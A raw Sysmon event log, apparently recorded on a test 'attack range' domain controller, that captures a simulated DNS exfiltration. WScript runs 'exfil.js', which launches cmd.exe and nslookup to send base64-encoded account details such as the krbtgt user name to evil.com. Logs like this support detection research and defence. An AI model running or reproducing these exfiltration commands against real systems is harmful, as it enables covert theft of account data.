14:21:56.927{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.927{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-0147-000000005F02}6116C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.927{2E1864BB-1904-629A-FF46-000000005F02}75565976C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-0147-000000005F02}6116C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.941{2E1864BB-1904-629A-0147-000000005F02}6116C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-FF46-000000005F02}7556C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnok.tmp 2>&1 10341000x8000000000000000217312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.911{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-0047-000000005F02}2556C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.911{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-0047-000000005F02}2556C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.911{2E1864BB-1904-629A-0047-000000005F02}25567732C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-FF46-000000005F02}7556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.888{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-0047-000000005F02}2556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.888{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-FF46-000000005F02}7556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.888{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.888{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.888{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.888{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.888{2E1864BB-18E0-629A-6742-000000005F02}39762824C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-FF46-000000005F02}7556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.888{2E1864BB-1904-629A-FF46-000000005F02}7556C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnok.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.873{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljdaua.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.857{2E1864BB-1904-629A-FD46-000000005F02}65204344C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-FE46-000000005F02}2536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.857{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.857{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.857{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.857{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.841{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-FE46-000000005F02}2536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.841{2E1864BB-1904-629A-FC46-000000005F02}70367468C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-FE46-000000005F02}2536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.856{2E1864BB-1904-629A-FE46-000000005F02}2536C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-FC46-000000005F02}7036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljdaua.tmp 2>&1 10341000x8000000000000000217292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.826{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-FD46-000000005F02}6520C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.826{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-FD46-000000005F02}6520C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.826{2E1864BB-1904-629A-FD46-000000005F02}65204344C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-FC46-000000005F02}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.810{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-FD46-000000005F02}6520C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.810{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.810{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.810{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.810{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 